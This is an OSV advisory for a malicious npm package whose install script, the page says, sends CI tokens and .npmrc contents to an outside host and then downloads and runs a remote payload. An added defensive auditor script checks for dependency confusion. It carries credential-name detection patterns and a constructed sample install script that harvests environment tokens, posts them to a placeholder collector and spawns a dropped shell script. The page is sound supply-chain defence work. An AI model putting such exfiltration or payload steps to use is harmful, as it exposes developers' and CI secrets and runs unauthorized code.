@databus-service-ui/ui-event @9.9.10
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4351
Ecosystem
npm
Summary
scripts/postinstall.js performs two install-time attacks against any machine that runs npm install.

(1) Credential exfiltration: it iterates process.env collecting variables whose names match npm_token, github_token, aws_access_key_id, aws_secret_access_key, artifactory_token, nexus_token, node_auth_token, npm_config__auth, etc.; reads ~/.npmrc, /etc/npmrc, and the .npmrc in the current working directory; bundles these with hostname, user, cwd and CI flags; and POSTs the bundle to https://oob.moika.tech/report.

(2) Remote code execution: it fetches an OS-specific script from https://oob.moika.tech/payload/{linux,mac,win} (unpinned, no integrity check), writes it to os.tmpdir() as ._databus-service-ui_init.sh or ._databus-service-ui_init.bat, chmods it 0755, and spawns it detached via /bin/sh or cmd.exe.

The package is scoped @databus-service-ui/*, carries version 9.9.10, and its README points at an internal-only registry (npm.databus-service-ui.io): the textbook dependency-confusion shape, designed to win resolution over an internal package of the same name. The script's own comment self-labels it 'Dependency confusion payload — AUTHORIZED TESTING ONLY' and it reports poc: 'dependency-confusion-npm', but from any installer's perspective the harm (full CI credential compromise plus arbitrary code execution from oob.moika.tech) is identical to a real attack.
Source: amazon-inspector (b82b3af71dce087a185cffa6f3691ad5a4e4c3d9e35154070ef4ad0dd4f15b10)
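The two things a practitioner wants to check after reading this report are whether a lockfile resolved a scoped package from the public registry although .npmrc routes that scope to an internal registry (the dependency-confusion shape), and whether a package's install script shows the behaviours listed above. The following is an added example written for this page, not code from the malicious package, from OSV or from npm. It works on the package-lock.json v2/v3 layout (the `packages` map keyed by `node_modules/...`, with `resolved` and `hasInstallScript`) and on the `@scope:registry=URL` lines of an .npmrc; the lockfile, the .npmrc and both install scripts below are constructed for the example, and the collector domain `collector.example.invalid` is a placeholder standing in for the advisory's oob.moika.tech.

```javascript
// Added example: audit a package-lock.json v2/v3 plus an .npmrc for the
// dependency-confusion shape, and statically scan install scripts for the
// behaviours the advisory describes. All inputs here are constructed.

const PUBLIC_REGISTRY_HOSTS = new Set(["registry.npmjs.org", "registry.yarnpkg.com"]);

// Parse the `@scope:registry=URL` lines of an .npmrc into a scope -> registry map.
function parseScopeRegistries(npmrcText) {
  const scopes = {};
  for (const raw of npmrcText.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const m = line.match(/^(@[^:=\s]+):registry\s*=\s*(\S+)$/);
    if (m) scopes[m[1]] = m[2].replace(/\/+$/, "");
  }
  return scopes;
}

// Lockfile keys look like "node_modules/@scope/name" (possibly nested).
function packageNameFromLockKey(key) {
  const idx = key.lastIndexOf("node_modules/");
  return idx === -1 ? key : key.slice(idx + "node_modules/".length);
}

function scopeOf(name) {
  return name.startsWith("@") ? name.split("/")[0] : null;
}

// A scoped package whose scope is pinned to an internal registry in .npmrc but
// whose `resolved` URL points at a public registry is the confusion shape.
function findConfusedPackages(lock, scopeRegistries) {
  const findings = [];
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (key === "" || !entry.resolved) continue;
    const name = packageNameFromLockKey(key);
    const scope = scopeOf(name);
    if (!scope || !scopeRegistries[scope]) continue;
    const expectedHost = new URL(scopeRegistries[scope]).host;
    const actualHost = new URL(entry.resolved).host;
    if (actualHost !== expectedHost && PUBLIC_REGISTRY_HOSTS.has(actualHost)) {
      findings.push({ name, version: entry.version, expectedHost, actualHost,
                      hasInstallScript: Boolean(entry.hasInstallScript) });
    }
  }
  return findings;
}

// Crude indicator scan of an install script's source. Each predicate approximates
// one behaviour from the advisory; a hit is a reason to read the script, not proof.
const CREDENTIAL_NAMES = /npm_token|github_token|aws_(access_key_id|secret_access_key)|artifactory_token|nexus_token|node_auth_token|npm_config__auth/i;
const INDICATORS = [
  ["env-credential-harvest", s => /process\.env/.test(s) && CREDENTIAL_NAMES.test(s)],
  ["npmrc-read", s => /\.npmrc/.test(s)],
  ["remote-fetch", s => /https?:\/\//.test(s)],
  ["child-process-spawn", s => /child_process|\b(spawn|exec|execSync|spawnSync)\s*\(/.test(s)],
  ["tmpdir-drop", s => /os\.tmpdir\s*\(\)/.test(s)],
  ["chmod-executable", s => /chmod(Sync)?\s*\(/.test(s)],
];

function scanInstallScript(source) {
  const indicators = INDICATORS.filter(([, test]) => test(source)).map(([label]) => label);
  const urls = [...new Set(source.match(/https?:\/\/[^\s'"`)]+/g) || [])];
  return { indicators, urls };
}

// installScripts: package name -> source of its (post)install script, which in
// practice you read from node_modules/<name>/<scripts.postinstall>.
function auditLock(lock, npmrcText, installScripts) {
  const scopes = parseScopeRegistries(npmrcText);
  const confused = findConfusedPackages(lock, scopes);
  const scripts = {};
  for (const [name, src] of Object.entries(installScripts)) scripts[name] = scanInstallScript(src);
  return { confused, scripts };
}

// ---- constructed sample inputs ----
const SAMPLE_NPMRC = [
  "# constructed: internal scope pinned to the company registry",
  "@databus-service-ui:registry=https://npm.databus-service-ui.io/",
  "//npm.databus-service-ui.io/:_authToken=${INTERNAL_NPM_TOKEN}",
].join("\n");

const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "app" },
    "node_modules/@databus-service-ui/ui-core": {
      version: "2.1.0", resolved: "https://npm.databus-service-ui.io/@databus-service-ui/ui-core/-/ui-core-2.1.0.tgz" },
    "node_modules/@databus-service-ui/ui-event": {
      version: "9.9.10", hasInstallScript: true,
      resolved: "https://registry.npmjs.org/@databus-service-ui/ui-event/-/ui-event-9.9.10.tgz" },
    "node_modules/left-pad": { version: "1.3.0", resolved: "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz" },
  },
};

// Constructed stand-in mirroring the advisory's described behaviour; placeholder domain.
const SAMPLE_POSTINSTALL = `
const os = require("os"), fs = require("fs"), path = require("path"), { spawn } = require("child_process");
const wanted = /npm_token|github_token|aws_access_key_id|node_auth_token/i;
const loot = {};
for (const [k, v] of Object.entries(process.env)) if (wanted.test(k)) loot[k] = v;
try { loot.npmrc = fs.readFileSync(path.join(os.homedir(), ".npmrc"), "utf8"); } catch {}
post("https://collector.example.invalid/report", loot);
const drop = path.join(os.tmpdir(), "init.sh");
fs.chmodSync(drop, 0o755);
spawn("/bin/sh", [drop], { detached: true });
`;
const BENIGN_POSTINSTALL = `console.log("thanks for installing");`;

console.log(JSON.stringify(auditLock(SAMPLE_LOCK, SAMPLE_NPMRC,
  { "@databus-service-ui/ui-event": SAMPLE_POSTINSTALL, "left-pad": BENIGN_POSTINSTALL }), null, 2));
```

The `remote-fetch` and `child-process-spawn` predicates fire on plenty of legitimate native-build packages, so treat the scan as triage, not as a verdict; the confusion check is the sharper signal. Independently of scanning, the install-time damage described above does not happen when CI runs `npm ci --ignore-scripts` (or sets `ignore-scripts=true` in .npmrc), and the resolution hijack does not happen when every internal scope is pinned to the internal registry in the .npmrc that the build actually uses.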